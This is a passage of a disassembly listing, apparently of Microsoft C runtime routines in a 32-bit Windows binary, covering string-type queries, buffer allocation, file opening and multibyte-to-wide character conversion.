; ---------------------------------------------------------------------------
loc_43128E: ; CODE XREF: sub_431210+2D�j
; sub_431210+50�j ...
cmp ds:dword_4F354C, 2
jnz short loc_4312C5
cmp [ebp+arg_14], 0
jnz short loc_4312A6
mov edx, ds:dword_4F33F8
mov [ebp+arg_14], edx
loc_4312A6: ; CODE XREF: sub_431210+8B�j
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+arg_14]
push ecx
call ds:dword_4F5308 ; GetStringTypeA
jmp loc_4313B8
; ---------------------------------------------------------------------------
loc_4312C5: ; CODE XREF: sub_431210+85�j
cmp ds:dword_4F354C, 1
jnz loc_4313B6
cmp [ebp+arg_10], 0
jnz short loc_4312E1
mov edx, ds:dword_4F3408
mov [ebp+arg_10], edx
loc_4312E1: ; CODE XREF: sub_431210+C6�j
push 0
push 0
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_18]
neg edx
sbb edx, edx
and edx, 8
add edx, 1
push edx
mov eax, [ebp+arg_10]
push eax
call ds:dword_4F5454 ; MultiByteToWideChar
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jnz short loc_431315
xor eax, eax
jmp loc_4313B8
; ---------------------------------------------------------------------------
loc_431315: ; CODE XREF: sub_431210+FC�j
mov [ebp+var_4], 0
mov eax, [ebp+var_20]
shl eax, 1
add eax, 3
and al, 0FCh
call sub_41EF80
mov [ebp+var_2C], esp
mov [ebp+var_18], esp
mov ecx, [ebp+var_2C]
mov [ebp+var_24], ecx
mov edx, [ebp+var_20]
shl edx, 1
push edx
push 0
mov eax, [ebp+var_24]
push eax
call sub_41E4B0
add esp, 0Ch
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_43136B
; ---------------------------------------------------------------------------
mov eax, 1
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_24], 0
mov [ebp+var_4], 0FFFFFFFFh
loc_43136B: ; CODE XREF: sub_431210+142�j
cmp [ebp+var_24], 0
jnz short loc_431375
xor eax, eax
jmp short loc_4313B8
; ---------------------------------------------------------------------------
loc_431375: ; CODE XREF: sub_431210+15F�j
mov ecx, [ebp+var_20]
push ecx
mov edx, [ebp+var_24]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
push 1
mov edx, [ebp+arg_10]
push edx
call ds:dword_4F5454 ; MultiByteToWideChar
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jnz short loc_43139E
xor eax, eax
jmp short loc_4313B8
; ---------------------------------------------------------------------------
loc_43139E: ; CODE XREF: sub_431210+188�j
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+var_28]
push ecx
mov edx, [ebp+var_24]
push edx
mov eax, [ebp+arg_0]
push eax
call ds:dword_4F5304 ; GetStringTypeW
jmp short loc_4313B8
; ---------------------------------------------------------------------------
loc_4313B6: ; CODE XREF: sub_431210+BC�j
xor eax, eax
loc_4313B8: ; CODE XREF: sub_431210+79�j
; sub_431210+B0�j ...
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_431210 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4313D0 proc near ; CODE XREF: sub_427100+A1�p
; sub_427CE0+137�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
loc_4313D7: ; CODE XREF: sub_4313D0+2F�j
cmp [ebp+arg_0], 0
jnz short loc_4313FB
push offset dword_43C514
push 0
push 2Eh
push offset dword_43D784
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_4313FB
int 3 ; Trap to Debugger
loc_4313FB: ; CODE XREF: sub_4313D0+B�j
; sub_4313D0+28�j
xor eax, eax
test eax, eax
jnz short loc_4313D7
mov ecx, ds:dword_4F336C
add ecx, 1
mov ds:dword_4F336C, ecx
mov edx, [ebp+arg_0]
mov [ebp+var_4], edx
push 3Bh
push offset dword_43D784
push 2
push 1000h
call sub_41BE70
add esp, 10h
mov ecx, [ebp+var_4]
mov [ecx+8], eax
mov edx, [ebp+var_4]
cmp dword ptr [edx+8], 0
jz short loc_431456
mov eax, [ebp+var_4]
mov ecx, [eax+0Ch]
or ecx, 8
mov edx, [ebp+var_4]
mov [edx+0Ch], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax+18h], 1000h
jmp short loc_43147B
; ---------------------------------------------------------------------------
loc_431456: ; CODE XREF: sub_4313D0+69�j
mov ecx, [ebp+var_4]
mov edx, [ecx+0Ch]
or edx, 4
mov eax, [ebp+var_4]
mov [eax+0Ch], edx
mov ecx, [ebp+var_4]
add ecx, 14h
mov edx, [ebp+var_4]
mov [edx+8], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax+18h], 2
loc_43147B: ; CODE XREF: sub_4313D0+84�j
mov ecx, [ebp+var_4]
mov edx, [ebp+var_4]
mov eax, [edx+8]
mov [ecx], eax
mov ecx, [ebp+var_4]
mov dword ptr [ecx+4], 0
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4313D0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 8
lea eax, [ebp+10h]
mov [ebp-8], eax
mov ecx, [ebp-8]
add ecx, 4
mov [ebp-8], ecx
mov edx, [ebp-8]
mov eax, [edx-4]
mov [ebp-4], eax
mov dword ptr [ebp-8], 0
mov ecx, [ebp-4]
push ecx
push 40h
mov edx, [ebp+0Ch]
push edx
mov eax, [ebp+8]
push eax
call sub_4314E0
add esp, 10h
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4314E0 proc near ; CODE XREF: sub_4277D0+2B0�p
; _0:004314D3�p
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 48h
mov [ebp+var_24], 0Ch
mov [ebp+var_20], 0
mov eax, [ebp+arg_4]
and eax, 80h
test eax, eax
jz short loc_43150D
mov [ebp+var_1C], 0
mov [ebp+var_38], 10h
jmp short loc_431518
; ---------------------------------------------------------------------------
loc_43150D: ; CODE XREF: sub_4314E0+1E�j
mov [ebp+var_1C], 1
mov [ebp+var_38], 0
loc_431518: ; CODE XREF: sub_4314E0+2B�j
mov ecx, [ebp+arg_4]
and ecx, 8000h
test ecx, ecx
jnz short loc_431551
mov edx, [ebp+arg_4]
and edx, 4000h
test edx, edx
jz short loc_43153C
mov al, [ebp+var_38]
or al, 80h
mov [ebp+var_38], al
jmp short loc_431551
; ---------------------------------------------------------------------------
loc_43153C: ; CODE XREF: sub_4314E0+50�j
cmp ds:dword_4F3678, 8000h
jz short loc_431551
mov cl, [ebp+var_38]
or cl, 80h
mov [ebp+var_38], cl
loc_431551: ; CODE XREF: sub_4314E0+43�j
; sub_4314E0+5A�j ...
mov edx, [ebp+arg_4]
and edx, 3
mov [ebp+var_40], edx
cmp [ebp+var_40], 0
jz short loc_43156E
cmp [ebp+var_40], 1
jz short loc_431577
cmp [ebp+var_40], 2
jz short loc_431580
jmp short loc_431589
; ---------------------------------------------------------------------------
loc_43156E: ; CODE XREF: sub_4314E0+7E�j
mov [ebp+var_34], 80000000h
jmp short loc_4315A7
; ---------------------------------------------------------------------------
loc_431577: ; CODE XREF: sub_4314E0+84�j
mov [ebp+var_34], 40000000h
jmp short loc_4315A7
; ---------------------------------------------------------------------------
loc_431580: ; CODE XREF: sub_4314E0+8A�j
mov [ebp+var_34], 0C0000000h
jmp short loc_4315A7
; ---------------------------------------------------------------------------
loc_431589: ; CODE XREF: sub_4314E0+8C�j
call sub_429A90
mov dword ptr [eax], 16h
call sub_429AA0
mov dword ptr [eax], 0
or eax, 0FFFFFFFFh
jmp loc_4319EA
; ---------------------------------------------------------------------------
loc_4315A7: ; CODE XREF: sub_4314E0+95�j
; sub_4314E0+9E�j ...
mov eax, [ebp+arg_8]
mov [ebp+var_44], eax
mov ecx, [ebp+var_44]
sub ecx, 10h
mov [ebp+var_44], ecx
cmp [ebp+var_44], 30h
ja short loc_4315F2
mov eax, [ebp+var_44]
xor edx, edx
mov dl, byte_431A02[eax]
jmp off_4319EE[edx*4]
loc_4315CE: ; DATA XREF: _0:off_4319EE�o
mov [ebp+var_8], 0
jmp short loc_431610
; ---------------------------------------------------------------------------
loc_4315D7: ; CODE XREF: sub_4314E0+E7�j
; DATA XREF: _0:004319F2�o
mov [ebp+var_8], 1
jmp short loc_431610
; ---------------------------------------------------------------------------
loc_4315E0: ; CODE XREF: sub_4314E0+E7�j
; DATA XREF: _0:004319F6�o
mov [ebp+var_8], 2
jmp short loc_431610
; ---------------------------------------------------------------------------
loc_4315E9: ; CODE XREF: sub_4314E0+E7�j
; DATA XREF: _0:004319FA�o
mov [ebp+var_8], 3
jmp short loc_431610
; ---------------------------------------------------------------------------
loc_4315F2: ; CODE XREF: sub_4314E0+DA�j
; sub_4314E0+E7�j
; DATA XREF: ...
call sub_429A90
mov dword ptr [eax], 16h
call sub_429AA0
mov dword ptr [eax], 0
or eax, 0FFFFFFFFh
jmp loc_4319EA
; ---------------------------------------------------------------------------
loc_431610: ; CODE XREF: sub_4314E0+F5�j
; sub_4314E0+FE�j ...
mov ecx, [ebp+arg_4]
and ecx, 700h
mov [ebp+var_48], ecx
cmp [ebp+var_48], 400h
jg short loc_43165C
cmp [ebp+var_48], 400h
jz short loc_431679
cmp [ebp+var_48], 200h
jg short loc_431651
cmp [ebp+var_48], 200h
jz short loc_431694
cmp [ebp+var_48], 0
jz short loc_431679
cmp [ebp+var_48], 100h
jz short loc_431682
jmp short loc_4316A6
; ---------------------------------------------------------------------------
loc_431651: ; CODE XREF: sub_4314E0+155�j
cmp [ebp+var_48], 300h
jz short loc_43169D
jmp short loc_4316A6
; ---------------------------------------------------------------------------
loc_43165C: ; CODE XREF: sub_4314E0+143�j
cmp [ebp+var_48], 500h
jz short loc_43168B
cmp [ebp+var_48], 600h
jz short loc_431694
cmp [ebp+var_48], 700h
jz short loc_43168B
jmp short loc_4316A6
; ---------------------------------------------------------------------------
loc_431679: ; CODE XREF: sub_4314E0+14C�j
; sub_4314E0+164�j
mov [ebp+var_18], 3
jmp short loc_4316C4
; ---------------------------------------------------------------------------
loc_431682: ; CODE XREF: sub_4314E0+16D�j
mov [ebp+var_18], 4
jmp short loc_4316C4
; ---------------------------------------------------------------------------
loc_43168B: ; CODE XREF: sub_4314E0+183�j
; sub_4314E0+195�j
mov [ebp+var_18], 1
jmp short loc_4316C4
; ---------------------------------------------------------------------------
loc_431694: ; CODE XREF: sub_4314E0+15E�j
; sub_4314E0+18C�j
mov [ebp+var_18], 5
jmp short loc_4316C4
; ---------------------------------------------------------------------------
loc_43169D: ; CODE XREF: sub_4314E0+178�j
mov [ebp+var_18], 2
jmp short loc_4316C4
; ---------------------------------------------------------------------------
loc_4316A6: ; CODE XREF: sub_4314E0+16F�j
; sub_4314E0+17A�j ...
call sub_429A90
mov dword ptr [eax], 16h
call sub_429AA0
mov dword ptr [eax], 0
or eax, 0FFFFFFFFh
jmp loc_4319EA
; ---------------------------------------------------------------------------
loc_4316C4: ; CODE XREF: sub_4314E0+1A0�j
; sub_4314E0+1A9�j ...
mov [ebp+var_28], 80h
mov edx, [ebp+arg_4]
and edx, 100h
test edx, edx
jz short loc_431715
lea eax, [ebp+arg_C]
mov [ebp+var_2C], eax
mov ecx, [ebp+var_2C]
add ecx, 4
mov [ebp+var_2C], ecx
mov edx, [ebp+var_2C]
mov eax, [edx-4]
mov [ebp+var_10], eax
mov [ebp+var_2C], 0
mov ecx, ds:dword_4F32F4
not ecx
mov edx, [ebp+var_10]
and edx, ecx
and edx, 80h
test edx, edx
jnz short loc_431715
mov [ebp+var_28], 1
loc_431715: ; CODE XREF: sub_4314E0+1F6�j
; sub_4314E0+22C�j
mov eax, [ebp+arg_4]
and eax, 40h
test eax, eax
jz short loc_431737
mov ecx, [ebp+var_28]
or ecx, 4000000h
mov [ebp+var_28], ecx
mov edx, [ebp+var_34]
or edx, 10000h
mov [ebp+var_34], edx
loc_431737: ; CODE XREF: sub_4314E0+23D�j
mov eax, [ebp+arg_4]
and eax, 1000h
test eax, eax
jz short loc_43174C
mov ecx, [ebp+var_28]
or ch, 1
mov [ebp+var_28], ecx
loc_43174C: ; CODE XREF: sub_4314E0+261�j
mov edx, [ebp+arg_4]
and edx, 20h
test edx, edx
jz short loc_431763
mov eax, [ebp+var_28]
or eax, 8000000h
mov [ebp+var_28], eax
jmp short loc_431779
; ---------------------------------------------------------------------------
loc_431763: ; CODE XREF: sub_4314E0+274�j
mov ecx, [ebp+arg_4]
and ecx, 10h
test ecx, ecx
jz short loc_431779
mov edx, [ebp+var_28]
or edx, 10000000h
mov [ebp+var_28], edx
loc_431779: ; CODE XREF: sub_4314E0+281�j
; sub_4314E0+28B�j
call sub_430B60
mov [ebp+var_14], eax
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_4317A5
call sub_429A90
mov dword ptr [eax], 18h
call sub_429AA0
mov dword ptr [eax], 0
or eax, 0FFFFFFFFh
jmp loc_4319EA
; ---------------------------------------------------------------------------
loc_4317A5: ; CODE XREF: sub_4314E0+2A5�j
push 0
mov eax, [ebp+var_28]
push eax
mov ecx, [ebp+var_18]
push ecx
lea edx, [ebp+var_24]
push edx
mov eax, [ebp+var_8]
push eax
mov ecx, [ebp+var_34]
push ecx
mov edx, [ebp+arg_0]
push edx
call ds:off_4F53C0
mov [ebp+var_4], eax
cmp [ebp+var_4], 0FFFFFFFFh
jnz short loc_4317F1
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
call sub_4299F0
add esp, 4
mov eax, [ebp+var_14]
push eax
call sub_431100
add esp, 4
or eax, 0FFFFFFFFh
jmp loc_4319EA
; ---------------------------------------------------------------------------
loc_4317F1: ; CODE XREF: sub_4314E0+2EC�j
mov ecx, [ebp+var_4]
push ecx
call ds:dword_4F5314 ; GetFileType
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_431831
mov edx, [ebp+var_4]
push edx
call ds:off_4F533C
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
call sub_4299F0
add esp, 4
mov eax, [ebp+var_14]
push eax
call sub_431100
add esp, 4
or eax, 0FFFFFFFFh
jmp loc_4319EA
; ---------------------------------------------------------------------------
loc_431831: ; CODE XREF: sub_4314E0+322�j
cmp [ebp+var_C], 2
jnz short loc_431842
mov cl, [ebp+var_38]
or cl, 40h
mov [ebp+var_38], cl
jmp short loc_431851
; ---------------------------------------------------------------------------
loc_431842: ; CODE XREF: sub_4314E0+355�j
cmp [ebp+var_C], 3
jnz short loc_431851
mov dl, [ebp+var_38]
or dl, 8
mov [ebp+var_38], dl
loc_431851: ; CODE XREF: sub_4314E0+360�j
; sub_4314E0+366�j
mov eax, [ebp+var_4]
push eax
mov ecx, [ebp+var_14]
push ecx
call sub_430D50
add esp, 8
mov dl, [ebp+var_38]
or dl, 1
mov [ebp+var_38], dl
mov eax, [ebp+var_14]
sar eax, 5
mov ecx, [ebp+var_14]
and ecx, 1Fh
imul ecx, 24h
mov edx, ds:dword_4F36C0[eax*4]
mov al, [ebp+var_38]
mov [edx+ecx+4], al
movsx ecx, [ebp+var_38]
and ecx, 48h
test ecx, ecx
jnz loc_43198F
movsx edx, [ebp+var_38]
and edx, 80h
test edx, edx
jz loc_43198F
mov eax, [ebp+arg_4]
and eax, 2
test eax, eax
jz loc_43198F
push 2
push 0FFFFFFFFh
mov ecx, [ebp+var_14]
push ecx
call sub_42E570
add esp, 0Ch
mov [ebp+var_3C], eax
cmp [ebp+var_3C], 0FFFFFFFFh
jnz short loc_431901
call sub_429AA0
cmp dword ptr [eax], 83h
jz short loc_4318FC
mov edx, [ebp+var_14]
push edx
call sub_422CB0
add esp, 4
mov eax, [ebp+var_14]
push eax
call sub_431100
add esp, 4
or eax, 0FFFFFFFFh
jmp loc_4319EA
; ---------------------------------------------------------------------------
loc_4318FC: ; CODE XREF: sub_4314E0+3FA�j
jmp loc_43198F
; ---------------------------------------------------------------------------
loc_431901: ; CODE XREF: sub_4314E0+3ED�j
mov [ebp+var_30], 0
push 1
lea ecx, [ebp+var_30]
push ecx
mov edx, [ebp+var_14]
push edx
call sub_427380
add esp, 0Ch
test eax, eax
jnz short loc_431959
movsx eax, [ebp+var_30]
cmp eax, 1Ah
jnz short loc_431959
mov ecx, [ebp+var_3C]
push ecx
mov edx, [ebp+var_14]
push edx
call sub_435EC0
add esp, 8
cmp eax, 0FFFFFFFFh
jnz short loc_431959
mov eax, [ebp+var_14]
push eax
call sub_422CB0
add esp, 4
mov ecx, [ebp+var_14]
push ecx
call sub_431100
add esp, 4
or eax, 0FFFFFFFFh
jmp loc_4319EA
; ---------------------------------------------------------------------------
loc_431959: ; CODE XREF: sub_4314E0+439�j
; sub_4314E0+442�j ...
push 0
push 0
mov edx, [ebp+var_14]
push edx
call sub_42E570
add esp, 0Ch
mov [ebp+var_3C], eax
cmp [ebp+var_3C], 0FFFFFFFFh
jnz short loc_43198F
mov eax, [ebp+var_14]
push eax
call sub_422CB0
add esp, 4
mov ecx, [ebp+var_14]
push ecx
call sub_431100
add esp, 4
or eax, 0FFFFFFFFh
jmp short loc_4319EA
; ---------------------------------------------------------------------------
loc_43198F: ; CODE XREF: sub_4314E0+3B0�j
; sub_4314E0+3C2�j ...
movsx edx, [ebp+var_38]
and edx, 48h
test edx, edx
jnz short loc_4319DB
mov eax, [ebp+arg_4]
and eax, 8
test eax, eax
jz short loc_4319DB
mov ecx, [ebp+var_14]
sar ecx, 5
mov edx, [ebp+var_14]
and edx, 1Fh
imul edx, 24h
mov eax, ds:dword_4F36C0[ecx*4]
mov cl, [eax+edx+4]
or cl, 20h
mov edx, [ebp+var_14]
sar edx, 5
mov eax, [ebp+var_14]
and eax, 1Fh
imul eax, 24h
mov edx, ds:dword_4F36C0[edx*4]
mov [edx+eax+4], cl
loc_4319DB: ; CODE XREF: sub_4314E0+4B8�j
; sub_4314E0+4C2�j
mov eax, [ebp+var_14]
push eax
call sub_431100
add esp, 4
mov eax, [ebp+var_14]
loc_4319EA: ; CODE XREF: sub_4314E0+C2�j
; sub_4314E0+12B�j ...
mov esp, ebp
pop ebp
retn
sub_4314E0 endp
; ---------------------------------------------------------------------------
off_4319EE dd offset loc_4315CE ; DATA XREF: sub_4314E0+E7�r
dd offset loc_4315D7
dd offset loc_4315E0
dd offset loc_4315E9
dd offset loc_4315F2
byte_431A02 db 0 ; DATA XREF: sub_4314E0+E1�r
db 4
dd 3 dup(4040404h), 4010404h, 3 dup(4040404h), 4020404h
dd 3 dup(4040404h), 0CC030404h, 3 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431A40 proc near ; CODE XREF: sub_427CE0+127�p
; sub_429C90+40�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
cmp eax, ds:dword_4F37C0
jb short loc_431A52
xor eax, eax
jmp short loc_431A70
; ---------------------------------------------------------------------------
loc_431A52: ; CODE XREF: sub_431A40+C�j
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, ds:dword_4F36C0[ecx*4]
movsx eax, byte ptr [eax+edx+4]
and eax, 40h
loc_431A70: ; CODE XREF: sub_431A40+10�j
pop ebp
retn
sub_431A40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431A80 proc near ; CODE XREF: sub_427F60+3CA�p
; sub_427F60+B90�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 8
push offset dword_4F37C8
call ds:dword_4F5488 ; InterlockedIncrement
cmp ds:dword_4F37C4, 0
jz short loc_431AB8
push offset dword_4F37C8
call ds:dword_4F5484 ; InterlockedDecrement
push 13h
call sub_423280
add esp, 4
mov [ebp+var_4], 1
jmp short loc_431ABF
; ---------------------------------------------------------------------------
loc_431AB8: ; CODE XREF: sub_431A80+18�j
mov [ebp+var_4], 0
loc_431ABF: ; CODE XREF: sub_431A80+36�j
mov ax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_431B00
add esp, 8
mov [ebp+var_8], eax
cmp [ebp+var_4], 0
jz short loc_431AE5
push 13h
call sub_423320
add esp, 4
jmp short loc_431AF0
; ---------------------------------------------------------------------------
loc_431AE5: ; CODE XREF: sub_431A80+57�j
push offset dword_4F37C8
call ds:dword_4F5484 ; InterlockedDecrement
loc_431AF0: ; CODE XREF: sub_431A80+63�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_431A80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431B00 proc near ; CODE XREF: sub_431A80+48�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 8
cmp [ebp+arg_0], 0
jnz short loc_431B13
xor eax, eax
jmp loc_431B9C
; ---------------------------------------------------------------------------
loc_431B13: ; CODE XREF: sub_431B00+A�j
cmp ds:dword_4F33F8, 0
jnz short loc_431B4A
mov eax, [ebp+arg_4]
and eax, 0FFFFh
cmp eax, 0FFh
jle short loc_431B3B
call sub_429A90
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp short loc_431B9C
; ---------------------------------------------------------------------------
loc_431B3B: ; CODE XREF: sub_431B00+29�j
mov ecx, [ebp+arg_0]
mov dl, byte ptr [ebp+arg_4]
mov [ecx], dl
mov eax, 1
jmp short loc_431B9C
; ---------------------------------------------------------------------------
loc_431B4A: ; CODE XREF: sub_431B00+1A�j
mov [ebp+var_8], 0
lea eax, [ebp+var_8]
push eax
push 0
mov ecx, ds:dword_453DF0
push ecx
mov edx, [ebp+arg_0]
push edx
push 1
lea eax, [ebp+arg_4]
push eax
push 220h
mov ecx, ds:dword_4F3408
push ecx
call ds:dword_4F5450 ; WideCharToMultiByte
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_431B89
cmp [ebp+var_8], 0
jz short loc_431B99
loc_431B89: ; CODE XREF: sub_431B00+81�j
call sub_429A90
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp short loc_431B9C
; ---------------------------------------------------------------------------
loc_431B99: ; CODE XREF: sub_431B00+87�j
mov eax, [ebp+var_4]
loc_431B9C: ; CODE XREF: sub_431B00+E�j
; sub_431B00+39�j ...
mov esp, ebp
pop ebp
retn
sub_431B00 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431BA0 proc near ; CODE XREF: sub_429E90+74E�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push offset dword_4F37C8
call ds:dword_4F5488 ; InterlockedIncrement
cmp ds:dword_4F37C4, 0
jz short loc_431BD8
push offset dword_4F37C8
call ds:dword_4F5484 ; InterlockedDecrement
push 13h
call sub_423280
add esp, 4
mov [ebp+var_4], 1
jmp short loc_431BDF
; ---------------------------------------------------------------------------
loc_431BD8: ; CODE XREF: sub_431BA0+18�j
mov [ebp+var_4], 0
loc_431BDF: ; CODE XREF: sub_431BA0+36�j
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_431C20
add esp, 0Ch
mov [ebp+var_8], eax
cmp [ebp+var_4], 0
jz short loc_431C08
push 13h
call sub_423320
add esp, 4
jmp short loc_431C13
; ---------------------------------------------------------------------------
loc_431C08: ; CODE XREF: sub_431BA0+5A�j
push offset dword_4F37C8
call ds:dword_4F5484 ; InterlockedDecrement
loc_431C13: ; CODE XREF: sub_431BA0+66�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_431BA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431C20 proc near ; CODE XREF: sub_431BA0+4B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
loc_431C26: ; CODE XREF: sub_431C20+3A�j
cmp ds:dword_453DF0, 1
jz short loc_431C56
cmp ds:dword_453DF0, 2
jz short loc_431C56
push offset aMb_cur_max1Mb_ ; "MB_CUR_MAX == 1 || MB_CUR_MAX == 2"
push 0
push 4Fh
push offset dword_43D790
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_431C56
int 3 ; Trap to Debugger
loc_431C56: ; CODE XREF: sub_431C20+D�j
; sub_431C20+16�j ...
xor eax, eax
test eax, eax
jnz short loc_431C26
cmp [ebp+arg_4], 0
jz short loc_431C68
cmp [ebp+arg_8], 0
jnz short loc_431C6F
loc_431C68: ; CODE XREF: sub_431C20+40�j
xor eax, eax
jmp loc_431D79
; ---------------------------------------------------------------------------
loc_431C6F: ; CODE XREF: sub_431C20+46�j
mov ecx, [ebp+arg_4]
movsx edx, byte ptr [ecx]
test edx, edx
jnz short loc_431C8E
cmp [ebp+arg_0], 0
jz short loc_431C87
mov eax, [ebp+arg_0]
mov word ptr [eax], 0
loc_431C87: ; CODE XREF: sub_431C20+5D�j
xor eax, eax
jmp loc_431D79
; ---------------------------------------------------------------------------
loc_431C8E: ; CODE XREF: sub_431C20+57�j
cmp ds:dword_4F33F8, 0
jnz short loc_431CB4
cmp [ebp+arg_0], 0
jz short loc_431CAA
mov ecx, [ebp+arg_4]
movzx dx, byte ptr [ecx]
mov eax, [ebp+arg_0]
mov [eax], dx
loc_431CAA: ; CODE XREF: sub_431C20+7B�j
mov eax, 1
jmp loc_431D79
; ---------------------------------------------------------------------------
loc_431CB4: ; CODE XREF: sub_431C20+75�j
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
mov eax, ds:off_453BE4
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 8000h
test ecx, ecx
jz short loc_431D3D
cmp ds:dword_453DF0, 1
jle short loc_431D10
mov edx, [ebp+arg_8]
cmp edx, ds:dword_453DF0
jl short loc_431D10
xor eax, eax
cmp [ebp+arg_0], 0
setnz al
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, ds:dword_453DF0
push edx
mov eax, [ebp+arg_4]
push eax
push 9
mov ecx, ds:dword_4F3408
push ecx
call ds:dword_4F5454 ; MultiByteToWideChar
test eax, eax
jnz short loc_431D36
loc_431D10: ; CODE XREF: sub_431C20+B7�j
; sub_431C20+C2�j
mov edx, [ebp+arg_8]
cmp edx, ds:dword_453DF0
jb short loc_431D26
mov eax, [ebp+arg_4]
movsx ecx, byte ptr [eax+1]
test ecx, ecx
jnz short loc_431D36
loc_431D26: ; CODE XREF: sub_431C20+F9�j
call sub_429A90
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp short loc_431D79
; ---------------------------------------------------------------------------
loc_431D36: ; CODE XREF: sub_431C20+EE�j
; sub_431C20+104�j
mov eax, ds:dword_453DF0
jmp short loc_431D79
; ---------------------------------------------------------------------------
loc_431D3D: ; CODE XREF: sub_431C20+AE�j
xor edx, edx
cmp [ebp+arg_0], 0
setnz dl
push edx
mov eax, [ebp+arg_0]
push eax
push 1
mov ecx, [ebp+arg_4]
push ecx
push 9
mov edx, ds:dword_4F3408
push edx
call ds:dword_4F5454 ; MultiByteToWideChar
test eax, eax
jnz short loc_431D74
call sub_429A90
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp short loc_431D79
; ---------------------------------------------------------------------------
loc_431D74: ; CODE XREF: sub_431C20+142�j
mov eax, 1
loc_431D79: ; CODE XREF: sub_431C20+4A�j
; sub_431C20+69�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
sub_431C20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_431D80 proc near ; CODE XREF: sub_429E90+9D7�p
; sub_429E90+A65�p ...
cmp cl, 40h
jnb short loc_431D9A
cmp cl, 20h
jnb short loc_431D90
shld edx, eax, cl
shl eax, cl
retn
; ---------------------------------------------------------------------------
loc_431D90: ; CODE XREF: sub_431D80+8�j
mov edx, eax
xor eax, eax
and cl, 1Fh
shl edx, cl
retn
; ---------------------------------------------------------------------------
loc_431D9A: ; CODE XREF: sub_431D80+3�j
xor eax, eax
xor edx, edx
retn
sub_431D80 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
loc_431DA7: ; CODE XREF: _0:00431DCF�j
cmp dword ptr [ebp+0Ch], 0
jnz short loc_431DCB
